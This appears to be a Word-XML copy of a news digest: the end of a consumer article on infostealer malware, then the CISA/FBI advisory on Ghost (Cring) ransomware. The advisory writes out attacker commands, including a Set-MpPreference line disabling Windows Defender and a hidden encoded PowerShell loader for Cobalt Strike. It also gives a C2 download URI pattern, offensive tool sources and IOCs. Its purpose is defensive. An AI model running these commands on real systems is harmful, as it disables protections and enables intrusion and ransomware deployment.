more details about my best expert-reviewed password managers of 2025 here.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 Keep software updated: Cybercriminals exploit outdated software to deliver malware. Keeping your operating system, browsers and security software up to date ensures that known vulnerabilities are patched. Enable automatic updates whenever possible and install reputable antivirus or endpoint protection software that can detect and block infostealer threats before they compromise your system.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FIGHT BACK AGAINST DEBIT CARD HACKERS WHO ARE AFTER YOUR MONEYKurt's key takeaway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Given the surge in infostealer malware warnings, it is clear that cybercriminals are actively targeting passwords. Both organizations and individuals are urged to strengthen their security measures by enabling 2FA, monitoring credential exposure and using endpoint protection tools. While no security measure is completely foolproof, combining these practices can significantly reduce the risk of falling victim to infostealer malware.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CLICK HERE TO GET THE FOX NEWS APP</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 you feel that companies are doing enough to protect your data from infostealer malware and other cyber threats? Let us know by writing us at Cyberguy.com/Contact.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more of my tech tips and security alerts, subscribe to my free CyberGuy Report Newsletter by heading to Cyberguy.com/Newsletter.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Ask Kurt a question or let us know what stories you'd like us to cover.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Follow Kurt on his social channels: Facebook YouTube Instagram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Answers to the most asked CyberGuy questions: What is the best way to protect your Mac, Windows, iPhone and Android devices from getting hacked?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>What is the best way to stay private, secure and anonymous while browsing the web?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>How can I get rid of robocalls with apps and data removal services? How do I remove my private data from the internet?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New from Kurt: Try CyberGuy's new games (crosswords, word searches, trivia and more!) CyberGuy's exclusive coupons and deals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Copyright 2025 CyberGuy.com. All rights reserved.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Kurt "CyberGuy" Knutsson is an award-winning tech journalist who has a deep love of technology, gear and gadgets that make life better with his contributions for Fox News &amp; FOX Business beginning mornings on "FOX &amp; Friends." Got a tech question? Get Kurt's free CyberGuy Newsletter, share your voice, a story idea or comment at CyberGuy.com.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>FOX News 2025.02.26 17:45</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>https://www.foxnews.com/tech/malware-exposes-3-9-billion-passwords-huge-cybersecurity-threat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>#StopRansomware: Ghost (Cring) Ransomware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Release Date February 19, 2025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Alert Code AA25-050A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Cyber Threats and Advisories, Incident Detection, Response, and Prevention, Malware, Phishing, and Ransomware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Actions for Organizations to Take Today to Mitigate Cyber Threats Related to Ghost (Cring) Ransomware Activity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Maintain regular system backups stored separately from the source systems which cannot be altered or encrypted by potentially compromised network devices [CPG 2.R].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Patch known vulnerabilities by applying timely security updates to operating systems, software, and firmware within a risk-informed timeframe [CPG 2.F].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Common Vulnerabilities and Exposures (CVE): CVE-2018-13379, CVE-2010-2861, CVE-2009-3960, CVE-2021-34473, CVE-2021-34523, CVE-2021-31207.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Segment networks to restrict lateral movement from initial infected devices and other devices in the same organization [CPG 2.F].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Require Phishing-Resistant MFA for access to all privileged accounts and email services accounts.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Summary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Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.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Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint advisory to disseminate known Ghost (Cring)-("Ghost")-ransomware IOCs and TTPs identified through FBI investigation as recently as January 2025.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Beginning early 2021, Ghost actors began attacking victims whose internet facing services ran outdated versions of software and firmware. This indiscriminate targeting of networks containing vulnerabilities has led to the compromise of organizations across more than 70 countries, including organizations in China. Ghost actors, located in China, conduct these widespread attacks for financial gain. Affected victims include critical infrastructure, schools and universities, healthcare, government networks, religious institutions, technology and manufacturing companies, and numerous small- and medium-sized businesses.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Ghost actors rotate their ransomware executable payloads, switch file extensions for encrypted files, modify ransom note text, and use numerous ransom email addresses, which has led to variable attribution of this group over time. Names associated with this group include Ghost, Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. Samples of ransomware files Ghost used during attacks are: Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe.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Ghost actors use publicly available code to exploit Common Vulnerabilities and Exposures (CVEs) and gain access to internet facing servers. Ghost actors exploit well known vulnerabilities and target networks where available patches have not been applied.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FBI, CISA, and MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of Ghost ransomware incidents.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Download the PDF version of this report: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AA25-050A #StopRansomware: Ghost (Cring) Ransomware (PDF, 735.18 KB )</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a downloadable copy of IOCs, see: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AA25-050A STIX XML (XML, 78.67 KB )</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AA25-050A STIX XML (Additional IOCs) (XML, 74.01 KB )</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AA25-050A STIX JSON (JSON, 68.47 KB ) Technical Details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Note: This advisory uses the MITRE ATT&amp;CK(R) Matrix for Enterprise framework, version 16.1. See the MITRE ATT&amp;CK Tactics and Techniques section of this advisory for a table of the threat actors' activity mapped to MITRE ATT&amp;CK tactics and techniques. Initial Access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FBI has observed Ghost actors obtaining initial access to networks by exploiting public facing applications that are associated with multiple CVEs [T1190]. Their methodology includes leveraging vulnerabilities in Fortinet FortiOS appliances (CVE-2018-13379), servers running Adobe ColdFusion (CVE-2010-2861 and CVE-2009-3960), Microsoft SharePoint (CVE- 2019-0604), and Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, and CVE- 2021-31207- commonly referred to as the ProxyShell attack chain). Execution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Ghost actors have been observed uploading a web shell [T1505.003] to a compromised server and leveraging Windows Command Prompt [T1059.003] and/or PowerShell [T1059.001] to download and execute Cobalt Strike Beacon malware [T1105] that is then implanted on victim systems. Despite Ghost actors' malicious implementation, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Cobalt Strike is a commercially available adversary simulation tool often used for the purposes of testing an organization's security controls. Persistence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Persistence is not a major focus for Ghost actors, as they typically only spend a few days on victim networks. In multiple instances, they have been observed proceeding from initial compromise to the deployment of ransomware within the same day. However, Ghost actors sporadically create new local [T1136.001] and domain accounts [T1136.002] and change passwords for existing accounts [T1098]. In 2024, Ghost actors were observed deploying web shells [T1505.003] on victim web servers. Privilege Escalation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Ghost actors often rely on built in Cobalt Strike functions to steal process tokens running under the SYSTEM user context to impersonate the SYSTEM user, often for the purpose of running Beacon a second time with elevated privileges [T1134.001].</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Ghost actors have been observed using multiple open-source tools in an attempt at privilege escalation through exploitation [T1068] such as "SharpZeroLogon," "SharpGPPPass," "BadPotato," and "GodPotato." These privilege escalation tools would not generally be used by individuals with legitimate access and credentials.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See Table 1 for a descriptive listing of tools. Credential Access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Ghost actors use the built in Cobalt Strike function "hashdump" or Mimikatz [T1003] to collect passwords and/or password hashes to aid them with unauthorized logins and privilege escalation or to pivot to other victim devices. Defense Evasion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Ghost actors used their access through Cobalt Strike to display a list of running processes [T1057] to determine which antivirus software [T1518.001] is running so that it can be disabled [T1562.001]. Ghost frequently runs a command to disable Windows Defender on network connected devices. Options used in this command are: Set-MpPreference -DisableRealtimeMonitoring 1 - DisableIntrusionPreventionSystem 1 -DisableBehaviorMonitoring 1 - DisableScriptScanning 1 -DisableIOAVProtection 1 - EnableControlledFolderAccess Disabled -MAPSReporting Disabled - SubmitSamplesConsent NeverSend. Discovery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Ghost actors have been observed using other built-in Cobalt Strike commands for domain account discovery [T1087.002], open-source tools such as "SharpShares" for network share discovery [T1135], and "Ladon 911" and "SharpNBTScan" for remote systems discovery [T1018]. Network administrators would be unlikely to use these tools for network share or remote systems discovery. Lateral Movement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Ghost actors used elevated access and Windows Management Instrumentation Command-Line (WMIC) [T1047] to run PowerShell commands on additional systems on the victim network- often for the purpose of initiating additional Cobalt Strike Beacon infections. The associated encoded string is a base 64 PowerShell command that always begins with: powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIA... [T1132.001][T1564.003].</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string decodes to "$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("" and is involved with the execution of Cobalt Strike in memory on the target machine.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cases where lateral movement attempts are unsuccessful, Ghost actors have been observed abandoning an attack on a victim. Exfiltration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Ghost ransom notes often claim exfiltrated data will be sold if a ransom is not paid. However, Ghost actors do not frequently exfiltrate a significant amount of information or files, such as intellectual property or personally identifiable information (PII), that would cause significant harm to victims if leaked. The FBI has observed limited downloading of data to Cobalt Strike Team Servers [T1041]. Victims and other trusted third parties have reported limited uses of Mega.nz [T1567.002] and installed web shells for similar limited data exfiltration. Note: The typical data exfiltration is less than hundreds of gigabytes of data. Command and Control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Ghost actors rely heavily on Cobalt Strike Beacon malware and Cobalt Strike Team Servers for command and control (C2) operations, which function using hypertext transfer protocol (HTTP) and hypertext transfer protocol secure (HTTPS) [T1071.001]. Ghost rarely registers domains associated with their C2 servers. Instead, connections made to a uniform resource identifier (URI) of a C2 server, for the purpose of downloading and executing Beacon malware, directly reference the C2 server's IP address. For example, http://xxx.xxx.xxx.xxx:80/Google.com where xxx.xxx.xxx.xxx represents the C2 server's IP address.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email communication with victims, Ghost actors use legitimate email services that include traffic encryption features. [T1573] Some examples of emails services that Ghost actors have been observed using are Tutanota, Skiff, ProtonMail, Onionmail, and Mailfence.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Note: Table 2 contains a list of Ghost ransom email addresses. Impact and Encryption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Ghost actors use Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe, which are all ransomware executables that share similar functionality. Ghost variants can be used to encrypt specific directories or the entire system's storage [T1486]. The nature of executables' operability is based on command line arguments used when executing the ransomware file. Various file extensions and system folders are excluded during the encryption process to avoid encrypting files that would render targeted devices inoperable.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These ransomware payloads clear Windows Event Logs [T1070.001], disable the Volume Shadow Copy Service, and delete shadow copies to inhibit system recovery attempts [T1490]. Data encrypted with Ghost ransomware variants cannot be recovered without the decryption key. Ghost actors hold the encrypted data for ransom and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>typically demand anywhere from tens to hundreds of thousands of dollars in cryptocurrency in exchange for decryption software [T1486].</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impact of Ghost ransomware activity varies widely on a victim-to-victim basis. Ghost actors tend to move to other targets when confronted with hardened systems, such as those where proper network segmentation prevents lateral moment to other devices. Indicators of Compromise (IOC)</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 lists several tools and applications Ghost actors have used for their operations. The use of these tools and applications on a network should be investigated further.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Note: Authors of these tools generally state that they should not be used in illegal activity.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 Tools Leveraged by Ghost Actors Name Description Source Cobalt Strike Cobalt Strike is penetration testing software. Ghost actors use an unauthorized version of Cobalt Strike. N/A IOX Open-source proxy, used to establish a reverse proxy to a Ghost C2 server from an internal victim device. github[.]com/EddieIvan01/iox SharpShares.exe SharpShares.exe is used to enumerate accessible network shares in a domain. Ghost actors use this primarily for host discovery. github[.]com/mitchmoser/SharpShares SharpZeroLogon.exe SharpZeroLogon.exe attempts to exploit CVE-2020-1472 and is run against a target Domain Controller.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>github[.]com/leitosama/SharpZeroLogon SharpGPPPass.exe SharpGPPPass.exe attempts to exploit CVE-2014-1812 and targets XML files created through Group Policy Preferences that may contain passwords. N/A SpnDump.exe SpnDump.exe is used to list service principal name identifiers, which Ghost actors use for service and hostname enumeration. N/A NBT.exe A compiled version of SharpNBTScan, a NetBIOS scanner. Ghost actors use this tool for hostname and IP address enumeration.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>github[.]com/BronzeTicket/SharpNBTScan BadPotato.exe BadPotato.exe is an exploitation tool used for privilege escalation. github[.]com/BeichenDream/BadPotato God.exe God.exe is a compiled version of GodPotato and is used for privilege escalation. github[.]com/BeichenDream/GodPotato HFS (HTTP File Server) A portable web server program that Ghost actors use to host files for remote access and exfiltration. rejitto[.]com/hfs Ladon 911 A multifunctional scanning and exploitation tool, often used by Ghost actors with the MS17010 option to scan for SMB vulnerabilities associated with CVE-2017-0143 and CVE-2017-0144. github[.]com/k8gege/Ladon Web Shell A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access. Slight variation of github[.]com/BeichenDream/Chunk-Proxy/blob/main/proxy.aspx</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2: MD5 File Hashes Associated with Ghost Ransomware Activity File name MD5 File Hash Cring.exe c5d712f82d5d37bb284acd4468ab3533 Ghost.exe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34b3009590ec2d361f07cac320671410</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d9c019182d88290e5489cdf3b607f982 ElysiumO.exe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29e44e8994197bdb0c2be6fc5dfc15c2</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c9e35b5c1dc8856da25965b385a26ec4</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d1c5e7b8e937625891707f8b4b594314 Locker.exe ef6a213f59f3fbee2894bd6734bbaed2 iex.txt, pro.txt (IOX) ac58a214ce7deb3a578c10b97f93d9c3 x86.log (IOX)</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c3b8f6d102393b4542e9f951c9435255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0a5c4ad3ec240fbfd00bdc1d36bd54eb sp.txt (IOX) ff52fdf84448277b1bc121f592f753c5 main.txt (IOX) a2fd181f57548c215ac6891d000ec6b9 isx.txt (IOX) 625bd7275e1892eac50a22f8b4a6355d sock.txt (IOX) db38ef2e3d4d8cb785df48f458b35090 Ransom Email Addresses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3 is a subset of ransom email addresses that have been included in Ghost ransom notes.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3: Ransom Email Addresses Email Addresses asauribe@tutanota.com ghostbackup@skiff.com rainbowforever@tutanota.com cringghost@skiff.com ghosts1337@skiff.com retryit1998@mailfence.com crptbackup@skiff.com ghosts1337@tuta.io retryit1998@tutamail.com d3crypt@onionmail.org ghostsbackup@skiff.com rsacrpthelp@skiff.com d3svc@tuta.io hsharada@skiff.com rsahelp@protonmail.com eternalnightmare@tutanota.com just4money@tutanota.com sdghost@onionmail.org evilcorp@skiff.com kellyreiff@tutanota.com shadowghost@skiff.com fileunlock@onionmail.org kev1npt@tuta.io shadowghosts@tutanota.com fortihooks@protonmail.com lockhelp1998@skiff.com summerkiller@mailfence.com genesis1337@tutanota.com r.heisler@skiff.com summerkiller@tutanota.com ghost1998@tutamail.com rainbowforever@skiff.com webroothooks@tutanota.com Ransom Notes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Starting approximately in August 2024, Ghost actors began using TOX IDs in ransom notes as an alternative method for communicating with victims. For example: EFE31926F41889DBF6588F27A2EC3A2D7DEF7D2E9E0A1DEFD39B976A49C11F0E19E03998DBDA and E83CD54EAAB0F31040D855E1ED993E2AC92652FF8E8742D3901580339D135C6EBCD71002885B. MITRE ATT&amp;CK Tactics and Techniques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See Table 4 to Table 13 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, version 16.1, see CISA and MITRE ATT&amp;CK's Best Practices for MITRE ATT&amp;CK Mapping and CISA's Decider Tool.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4: Initial Access Technique Title ID Use Exploit Public-Facing Application T1190 Ghost actors exploit multiple vulnerabilities in public-facing systems to gain initial access to servers.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5: Execution Technique Title ID Use Windows Management Instrumentation T1047 Ghost actors abuse WMI to run PowerShell scripts on other devices, resulting in their infection with Cobalt Strike Beacon malware.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>PowerShell T1059.001 Ghost actors use PowerShell for various functions including to deploy Cobalt Strike.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Windows Command Shell T1059.003 Ghost actors use the Windows Command Shell to download malicious content on to victim servers.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6: Persistence Technique Title ID Use Account Manipulation T1098 Ghost actors change passwords for already established accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Local Account T1136.001 Ghost actors create new accounts or makes modifications to local accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Domain Account T1136.002 Ghost actors create new accounts or makes modifications to domain accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Web Shell T1505.003 Ghost actors upload web shells to victim servers to gain access and for persistence.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7: Privilege Escalation Technique Title ID Use Exploitation for Privilege Escalation T1068 Ghost actors use a suite of open source tools in an attempt to gain elevated privileges through exploitation of vulnerabilities.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Token Impersonation/Theft T1134.001 Ghost actors use Cobalt Strike to steal process tokens of processes running at a higher privilege.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8: Defense Evasion Technique Title ID Use Application Layer Protocol: Web Protocols T1071.001 Ghost actors use HTTP and HTTPS protocols while conducting C2 operations.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Impair Defenses: Disable or Modify Tools T1562.001 Ghost actors disable antivirus products.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Hidden Window T1564.003 Ghost actors use PowerShell to conceal malicious content within legitimate appearing command windows.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9: Credential Access Technique Title ID Use OS Credential Dumping T1003 Ghost actors use Mimikatz and the Cobalt Strike "hashdump" command to collect passwords and password hashes.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10: Discovery Technique Title ID Use Remote System Discovery T1018 Ghost actors use tools like Ladon 911 and ShapNBTScan for remote systems discovery.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Process Discovery T1057 Ghost actors run a ps command to list running processes on an infected device.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Domain Account Discovery T1087.002 Ghost actors run commands such as net group "Domain Admins" /domain to discover a list of domain administrator accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Network Share Discovery T1135 Ghost actors use various tools for network share discovery for the purpose of host enumeration.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Software Discovery T1518 Ghost actors use their access to determine which antivirus software is running.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Security Software Discovery T1518.001 Ghost actors run Cobalt Strike to enumerate running antivirus software.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11: Exfiltration Technique Title ID Use Exfiltration Over C2 Channel T1041 Ghost actors use both web shells and Cobalt Strike to exfiltrate limited data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Exfiltration to Cloud Storage T1567.002 Ghost actors sometimes use legitimate cloud storage providers such as Mega.nz for malicious exfiltration operations.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12: Command and Control Technique Title ID Use Web Protocols T1071.001 Ghost actors use Cobalt Strike Beacon malware and Cobalt Strike Team Servers which communicate over HTTP and HTTPS.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ingress Tool Transfer T1105 Ghost actors use Cobalt Strike Beacon malware to deliver ransomware payloads to victim servers.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Standard Encoding T1132.001 Ghost actors use PowerShell commands to encode network traffic which reduces their likelihood of being detected during lateral movement.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Encrypted Channel T1573 Ghost actors use encrypted email platforms to facilitate communications.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13: Impact Technique Title ID Use Data Encrypted for Impact T1486 Ghost actors use ransomware variants Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe to encrypt victim files for ransom.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Inhibit System Recovery T1490 Ghost actors delete volume shadow copies. Mitigations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FBI, CISA, and MS-ISAC recommend organizations reference their #StopRansomware Guide and implement the mitigations below to improve cybersecurity posture on the basis of the Ghost ransomware activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA's CPGs webpage for more information on the CPGs, including additional recommended baseline protections. Maintain regular system backups that are known-good and stored offline or are segmented from source systems [CPG 2.R]. Ghost ransomware victims whose backups were unaffected by the ransomware attack were often able to restore operations without needing to contact Ghost actors or pay a ransom. Patch known vulnerabilities by applying timely security updates to operating systems, software, and firmware within a risk-informed timeframe [CPG 1.E].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Segment networks to restrict lateral movement from initial infected devices and other devices in the same organization [CPG 2.F].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Require Phishing-Resistant MFA for access to all privileged accounts and email services accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Train users to recognize phishing attempts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Monitor for unauthorized use of PowerShell. Ghost actors leverage PowerShell for malicious purposes, although it is often a helpful tool that is used by administrators and defenders to manage system resources. For more information, visit NSA and CISA's joint guidance on PowerShell best practices.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
